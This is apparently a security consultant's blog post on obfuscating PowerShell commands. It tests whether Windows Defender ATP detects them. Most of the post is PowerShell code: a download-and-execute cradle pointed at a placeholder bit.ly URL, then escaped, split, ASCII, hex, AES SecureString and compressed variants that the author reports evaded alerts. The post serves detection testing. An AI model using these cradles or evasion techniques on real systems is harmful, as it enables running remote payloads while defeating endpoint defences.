Obfuscating PowerShell Commands

While testing Windows Defender Advanced Threat Protection (WDATP), I ran various PowerShell scripts to invoke certain downloads or specific tasks. As I was doing it, I wondered if it was smart enough to see obfuscated commands. Then I wondered how I could obfuscate them to make it harder to understand.

As an example, I will use the following command line with a made-up URL:

Invoke-Expression (New-Object System.Net.WebClient).DownloadString(“https://bit.ly/sample”)

The command, simple retrieves the file from the URL specified and loads it into the current PowerShell session. WDATP. Easily recognizes the standard command, with ease and flags it. What about if we try a few different obfuscation approaches. See for the examples used below: http://rvasec.com/slides/2017/Bohannon_Daniel–RVAsec_2017.pptx

Easy Obfuscation
Invoke-Expression (New-Object Net.WebClient).DownloadString(“htt” + “ps://” + “bit.ly/sample”)

Invoke-Expression (New-Object Net.WebClient).DownloadString(‘htt’ + ‘ps://’ + ‘bit.ly/sample’)

Invoke-Expression (New-Object Net.WebClient).”`D`o`wn`l`oa`d`Str`in`g”(‘htt’ + ‘ps://’ + ‘bit.ly/sample’)

 

Medium Obfuscation
Invoke-Expression (New-Object Net.WebClient).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”(‘htt’ + ‘ps://’ + ‘bit.ly/sample’)

Invoke-Expression (New-Object “`N`e`T`.`W`e`B`C`l`i`e`N`t”).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”(‘htt’ + ‘ps://’ + ‘bit.ly/sample’)

Invoke-Expression (& (`G`C`M *w-O*) “`N`e`T`.`W`e`B`C`l`i`e`N`T”).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”( ‘ht’+’tps://’ + ‘bit.ly/sample’)

 

Hard Obfuscation
`I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*) “`N`e`T`.`W`e`B`C`l`i`e`N`T”).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”( ‘ht’+’tps://bit.ly/sample’)

. ((${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`T}.”`I`N`V`o`k`e`C`o`m`m`A`N`d”). “`N`e`w`S`c`R`i`p`T`B`l`o`c`k“((& (`G`C`M *w-O*) “`N`e`T`.`W`e`B`C`l`i`e`N`T”).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”( ‘ht’+’tps://bit.ly/sample’)))

 

Interestingly, I did not see these get flagged and show up the console. However, when I ran it this way it did:

powershell -nop -c “iex(New-Object Net.WebClient).DownloadString(‘http://bit.ly/sample’)”

Even using the “Invoke-Obfuscation” framework with something like the following three didn’t raise the alert.

ASCII Encoding
[StRiNg]::JoIn( ” , [ChaR[]](73, 110, 118 ,111,107,101, 45 , 69, 120 ,112, 114 , 101, 115 ,115 , 105,111, 110,32,40,78 , 101 ,119, 45, 79 , 98 ,106 , 101 , 99 ,116, 32 , 83, 121,115 , 116, 101,109 , 46 , 78 , 101 ,116, 46,87,101, 98 ,67 ,108,105,101 , 110, 116,41 , 46, 68 , 111 , 119, 110 ,108 ,111, 97,100 ,83 , 116 , 114, 105 ,110, 103, 40 ,39, 104 ,116 , 116, 112 ,58,47,47 ,98 , 105,116,46 , 108 , 121, 47 , 115, 97, 109 , 112,108, 101 ,39, 41 ))|& ((gv ‘*MDr*’).NamE[3,11,2]-joiN”)

HEX Encoding
&( $sHeLlId[1]+$SHeLLiD[13]+’x’)(( ( 49, ‘6e’ , 76, ‘6f’,’6b’, 65,’2d’,45 , 78, 70, 72,65 , 73, 73,69, ‘6f’ , ‘6e’ ,20,28,’4e’ ,65 , 77, ‘2d’, ‘4f’ ,62, ‘6a’, 65,63 ,74 , 20 , 53 , 79,73 ,74,65,’6d’,’2e’,’4e’ , 65 ,74 , ‘2e’ , 57,65, 62,43,’6c’ ,69, 65,’6e’, 74,29 ,’2e’, 44 , ‘6f’ , 77, ‘6e’,’6c’ , ‘6f’ ,61, 64, 53,74 , 72 ,69 , ‘6e’ , 67, 28, 27, 68 , 74,74, 70 , ‘3a’ , ‘2f’ , ‘2f’,62 , 69, 74 ,’2e’ , ‘6c’, 79,’2f’ ,73, 61 , ‘6d’ , 70 ,’6c’,65, 27, 29)|foreAcH-objeCt {([COnvERT]::tOiNT16(( $_.TOSTrinG()), 16 )-as [chAR])} ) -JOin ”)

SecureString (AES) Encoding
.( $PsHOMe[4]+$PsHoMe[34]+’x’)(([ruNtiMe.inteROpseRViCes.MaRsHaL]::ptRtoStRinGuNi( [RuNTime.iNTERoPservIcES.marSHAL]::SecureStrinGToGLoBalaLLocuniCoDE($(‘76492d1116743f0423413b16050a5345MgB8AG0ARwBnAEEAUgBGAE8AMwB6AGsAbABPAEUAcgBNADEATgB5AHMAZAB2AGcAPQA9AHwAMwAxADgAZgBkADQAOABmADQAYQA2AGUAMgBjADkAOQA0AGYAZgAxADQAZQBhADcANwBkAGQAMwBmADgAZgAyAGUAMABkAGQAMAA1ADUANgA3AGMAYgA3AGUAOQBlADYAOQBmAGYAZABjADEANgBhADYAMwA0AGIANgA3ADQAYwBlAGQAMwAxAGUAZgAxADEANAA0ADIAMABkADgANgA0AGIAOABjAGUAOABkAGYAMgAyAGMAZAA1AGMAZgAzADYAOABmADAAYwA5AGQAYQA1ADAAYwA4AGQAMABiAGIANAA4ADcAYQAzADUAYwBlADAAZAA1AGYAYwAxAGQANQBjAGEAZgBiADYAYwAxADYAZQBlAGUAMgA0ADMANwA1AGYAOABhADkAZAA1AGQAZgBjADAAMAAyADQANwBiAGIAMABmADcAOQA4AGYAMQA0ADkAZAA3AGUAMwBmADgAMQBiADMAOAA5ADUANgAzADcAYQA0AGEAOQBhAGIANAA1ADgAZgBmAGYAMQAzADQAYgA0ADcAMAA4ADcAMQA0ADIAZQBkADIANwBjADQAMAAzAGQAMgA4AGQAZgAzAGQAZQBkADYAMABjADMAMQBlADkAMgBlAGMANABiAGQAZQBkADMAMAA5AGEAMwA0ADYAZABhADkAZQBlADcAZgBlADQAMQA3AGUAZQA0ADAAMgA4AGIAMgAzAGIAYwA5ADUANQA4AGQAMwA4AGIAYwAwADQAMQBiAGIAZABjADQAMABlADgAZAA4ADYAZgA1AGYAMwAwAGYANAAxADAAOAA4ADAAYQA2AGEAZQAxADgAZgA0ADkAZAA1ADYAMgA3AGIAZQA2ADAAZgAzADQANwAzAGYAYgAxAGUAZQBmADMAMAA3AGEANAA0ADYANwA5ADcAOQAwAGYAYwA5ADcANAAwADUAMQA5ADUAMQA3AGYAYwA5ADEAOAA5ADIAYgBjAGIANgAxADEANgA2ADEAZgBiADkANQA3ADcAZgAxADQAZQA4ADIA’| cOnVeRTTo-secUrestRING -KE (242..227)) )) ))

SecureString (AES) Encoding Compressed
(new-oBJect iO.COMPRESsiOn.deflATESTreAM( [Io.MEMoRyStreAm][SYStEm.convert]::FROmbASE64stRing(‘RVRdb+JADPwreThdQVURgdBe++Y0Kxodm3SBVAqIhzbNBcrXKdCGov7483i3OvEA3rU9nhkvXsub1++7Y6zLTrybqjr9Oynrp1VRHjpbGh+WtFnc3bXm4yzhHNWJk6kap4+HcoycSUcj53m06AzVUZfbUNWTVnseLDoJbVWbWz6lv0vGGGeMsWWM5FiOGUPVH/E9Y2iqDw80YoyJKt5rNZnWq2Q43VebNKQRjTb7Itutiv2rank/Whc318Ft79X3/euboP+nG/T6gd9/8a+7g+7zoB8MdBX+IpVRVtGAhjklFD6TCqig8BPnLyb8oGFFMwp7pDSVJrwmZWjShJoeCno0dEsPDaUUblGfG+pTZEg3iBXlDZ0pirmeTjTMaGbCJUWEc84rSBN1UZcazo80zSrOi3LO43uuT4h6NNTcD/kxaUM++iToF60pqYBjKK/okyKF7wb1msI1cLhfH3ncf4X7WcXnnC/1jDtz9UkFHOnfR8zfJ9QnMl/s+og+a5mnwrkG3x5FGfMJ35x+K8zN+YGraySW8ww6cJ8KeGfpVzkdDGLghRvcp+AJ3WTuAvxPdm7EBN3Oljf0lPkHwOP7pcxPPA/6GZ5D9ESdRv4a/bXooGxf6Eisn9W5i3jm+qTCPwPPrtUL9wQeZ8Sc3zifTsBnXwPRobL1lnfuzuEv5sotP455PvGLz7918+3+IJ99bqAH85K9yTFPz+Kij8Jc//MjY/lxnewj9sA43Z1/rMNGzuE3dDDWt9xYHWbiS4H5GsSMswQv0YHxEmP1T2X/Kudv5vxbu7lj+BNgL2SPwNu4PRC/vt+Bhi490a9x/VAnuqF+jfOu3Bv2F/tiLP/UuL0BLxs38j5Ex9i+Q9v3DJzU7bHsLd6D8DHuXRr3XnL7Drhv4nxOoRf2wlg+7OvGzf8mvjg/L7wv736/+1Dj43F/dVD3WV0epnW8G3pX69LzWjeDTicI2m2PP23v66fHf0+HZbkZxdHcX1y6369zv7+4vDhdtP8B’), [iO.CoMPresSiON.cOMPresSIoNmoDE]::dEcoMPreSs) |fOrEAch{ new-oBJect Io.sTREAmReadER($_ ,[SYSteM.tExT.eNcODinG]::AsciI) } ).readtoEND( ) | & ( ([sTRInG]$VErBOSeprEFerENCE)[1,3]+’x’-Join”)

To learn more about obfuscating PowerShell commands you can use the following links:

https://github.com/danielbohannon/Invoke-Obfuscation
https://www.sans.org/summit-archives/file/summit-archive-1492186586.pdf
https://blog.varonis.com/powershell-obfuscation-stealth-through-confusion-part-i/
https://blog.varonis.com/powershell-obfuscation-stealth-confusion-part-ii/
http://pentestit.com/invoke-obfuscation-powershell-command-script-obfuscator/
https://cobbr.io/ObfuscationDetection.html
https://gallery.technet.microsoft.com/scriptcenter/Generate-obfuscated-string-6ec72ffe

Now the good news is, if these were more malicious in nature than just downloading a file, then they would be flagged. For example using this method to download “Mimikatz” will trigger an alert.

Liam Cleary

I began my career as a Trainer of all things computer related. However, I very quickly realized that programming, breaking, and hacking was a lot more fun. I then spent the next few years working on core infrastructure and security services, until I found SharePoint. I am now the founder and owner of SharePlicity, a consulting company that focuses on all areas of Technology. My role within SharePlicity is to help organizations implement technology that will enhance internal and external collaboration, document and records management, automate business processes and of course security controls and protection. I am also an eleven-time Microsoft MVP focusing on Architecture but also cross the boundary into Development. My specialty over the past few years has been security in SharePoint and its surrounding platforms. I can also be found at user groups or conferences speaking, offering advice, spending time in the community, teaching my kids how to code, raspberry PI programming, hacking the planet or building Lego robots.

You may also like...